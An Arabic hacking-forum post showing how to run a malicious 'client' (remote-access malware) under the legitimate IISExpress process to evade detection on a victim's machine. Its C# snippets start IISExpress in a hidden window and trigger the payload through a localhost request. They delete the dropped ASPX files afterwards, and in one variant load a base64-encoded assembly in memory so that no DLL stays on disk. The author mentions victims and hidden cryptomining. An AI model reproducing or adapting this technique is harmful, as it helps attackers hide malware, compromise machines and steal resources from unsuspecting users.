28.01.2018 Run Your Client As IISExpress Process


  • الـلـهـم انـصـر اخـوانـنـا الـمـسـلـمـيـن فـي بـورمـا وكـن مـعـهـم يـاربـاه يـاربـاه

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
1,533
2,887
1
حياكم الله ياشباب
من سنة ارسلت لاحد الشباب ب سكاي بي "الاخ تركي مش تركي البتعرفوه > سليمان بيعرفه"
وقلت له انني سويت كذا واعطيته فديو والفديو كان ناتج الموضوع هنا ههه
اليوم تذكرته وقلت برفقه لكم لانني كنت نسيانه
الخلاصة ولان شرحت بالفديو
الكل يعلم انه عند انشائنا لمشروع ويب ابلكيشن بالفيجوال ستديو
وتريد تشغل الصفحة اللي سويتها تشغل ناتج عملك
رح يشتغل IISExpress الموجود بالمسار
C#:
C:\Program Files (x86)\IIS Express
مثل سيرفر الاباتشي بيجهز لك مشروعك على اللوكال هوست
وبتتصفحه بالشكل التالي
C#:
http://localhost:12758/
طيب وان رحت مايكروسوفت
Running IIS Express from the Command Line
وشفت كيف من الكوماند لاين تعمل هالشي
مش من جوا الفيجوال ستديو رح تحصل التالي
C#:
iisexpress /path:c:\myapp\ /port:9090
طيب تمام الملفات المطلوبة للباث هيه
لحتى اخبركم وش هيه لازم احكيلكم وش سويت
رحت عملت ويب ابلكشين بالفيجوال ستديو واضفت page
ومن حدث Page_Load اضفت استدعاء فانكشن اللي بتحتوي على نقطة الادخال
طبعا اضفت المكتبة الناتجة عن المشروع اللي بيحوي الفانكشن اللي فيها ميثود Main الحاوية على نقطة الادخال
C#:
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Web;
using System.Web.UI;
using System.Web.UI.WebControls;
using bypassmepls;
 
public partial class _Default : System.Web.UI.Page
{
    protected void Page_Load(object sender, EventArgs e)
    {
 
        bypassmepls.Program.Main();
    }
}
فمن اللي سويناه لازم نعرف انو بدنا الملفين
C#:
Default.aspx.cs // the code
Default.aspx // the form of the website i added just one button "not important to do
وبدنا ايضا المكتبة ..
تمام يعني بدنا 3 ملفات 2 منضمنهم ك سترينج بالسورس
والمكتبة اما انها بتبقى بجانب الملف بالمجلد اللي لازم تكون فيه
او منكتبها على اي مسار مع الملفين بعيدا عن اعين الضحية ..
بعد التشغيل سنقوم بحذف الملفين ..بحيث اصلا لن يظهرو عن كتابتهم
ولكن المكتبة ضرورية لتبقى متواجد حتى يقوم IISExpress بتشغيلها لنا
وعمل الكلاينت باسم العملية نفسها
بالسورس الناتج رح تلاحظوا انه مافي ابدا اي استدعاء للمكتبة او لنقطة ادخال
او اي شي يدل على الهاك واللينك اللي بالسورس رح يكون مثل مااسلفت لوكال هوست بيبعد الشك شوي
وايضا طريقة عمل ريكويست للينك ثورية وحلوة اذ لن تنفع تشغيل الصفحة بخفاء لاطريقتي ولاطريقة مكتبة كروم
جربت ولم ينفع طريقتي هنا لاخفاء الاكسبلورر
فتح المتصفح والدخول لرابط للتعدين بشكل مخفي من خلال رابط بدون اي ملفات بجهاز الضحية
ولا طريقة مكتبة الكروم
"طريقة شغالة مااحد يفهمني غلط خخخ"
بس لان المطلوب تشغيل اللوكال هوست مع تحديد البورت يتم هذا التناقض ماادري لماذا
اما عند وضعك لرابط عادي يتم تشغيله بخفاء من خلال طريقتي
ماعلينا مش موضوعنا اصلا ههه
عملت ويب ريكويست للرابط اللي نحنا منكون حددنا للIISExpress وش هوة البورت
من خلال الكوماند لاين
C#:
var startInfo = new System.Diagnostics.ProcessStartInfo
{
    FileName = @"C:\Windows\system32\cmd.exe",
    Arguments = $"/k iisexpress /path:{Directory.GetCurrentDirectory()} /port:12758",
    WorkingDirectory = "C:\\Program Files (x86)\\IIS Express",
    WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden
};
var myProcess = GetMyProcess(startInfo);
myProcess.Start();
وهنا عمل الويب ريكويست كانت فكرة حلوة مني ههه عشان اتفادى مشكلة ظهور الصفحة
مع انو حتى ظهورها مابيعني شي ابدا لانها صفحة عادية واكوادها سليمة ان عمل Ctrl+U
والايبي داخلي والخ ..
بس يعني خلينا كل شي يتم بخفاء

C#:
var request = (HttpWebRequest)WebRequest.Create("http://localhost:12758/");
           request.AllowAutoRedirect = false; // find out if this site is up and don't follow a redirector
           request.Method = "HEAD";
           try
           { // the process will run under iisexpress.exe process
               var response = request.GetResponse();
               File.Delete("Default.aspx");
               File.Delete("Default.aspx.cs");
               // do something with response.Headers to find out information about the request
           }
           catch
           {
               // no need
               // there is no libarry in references to call there is no entrypoint or any byte array to load or to run
           }
بالختام قلت بالفديو الاستغلال بشكله البدائي جدا "بس مش يعني مش منيح ممتاز مش بس منيح"
بس من الامكان جعله اقوا بكثير
الكلاينت الخاص بك رح يشتغل باسم عملية IISExpress
IISExpress رح يشغل المكتبة الخاصة بك "مكتبة الاختراق"
الناتج بيكون ملف واحد فقط بتخترق فيه
وقلت بالشرح انك بتعمل تحقق ان المسار موجود بتنفذ الاستغلال هنا
ان مش موجود بتنفذ شي ثاني لان مارح يكون IISExpress موجود بكل الاجهزة









يوجد ايضا فديو اخر بالمرفقات للاستغناء عن المكتبة
يعني مارح يبقى اي ملف بالهارد فقط الملف التنفيذي
بيكتب المستندين النصيين وبيمحيهم بلمح البصير والكلاينت بكون شغال باسم عملية iisexpress
C#:
using System;
public partial class _Default : System.Web.UI.Page
{
    protected void Page_Load(object sender, EventArgs e)
    {
        System.Reflection.Assembly.Load(Convert.FromBase64String("TVqQAA")).EntryPoint.Invoke(null, null);
 
    }
}
يعني الخلاصة ملفين تكست بينكتبو وبينمحو خلال نصف ثانية
وبيتم الاختراق ومافي لا dll ولا شي
والعملية هيه IISExpress
 

المرفقات

إخلاء مسؤلية

  • المنتدى غير مسؤول عن أي اتفاق تجاري أو تعاوني بين الأعضاء كل شخص يحمل مسئولية نفسه إتجاه مايقوم به protection-tips غير مسؤول عن أي اتفاق تجاري أو تعاوني بين الأعضاء كل شخص يحمل مسئولية نفسه إتجاه مايقوم به من بيع وشراء وإتفاق وأعطاء معلومات موقعه التعليقات المنشورة لا تعبر عن رأي معهد المنتدى ولا نتحمل أي مسؤولية قانونية حيال ذلك (ويتحمل كاتبها مسؤولية النشر).).

الإنتقال السريع

User Menu

تابعنا على الفيسبوك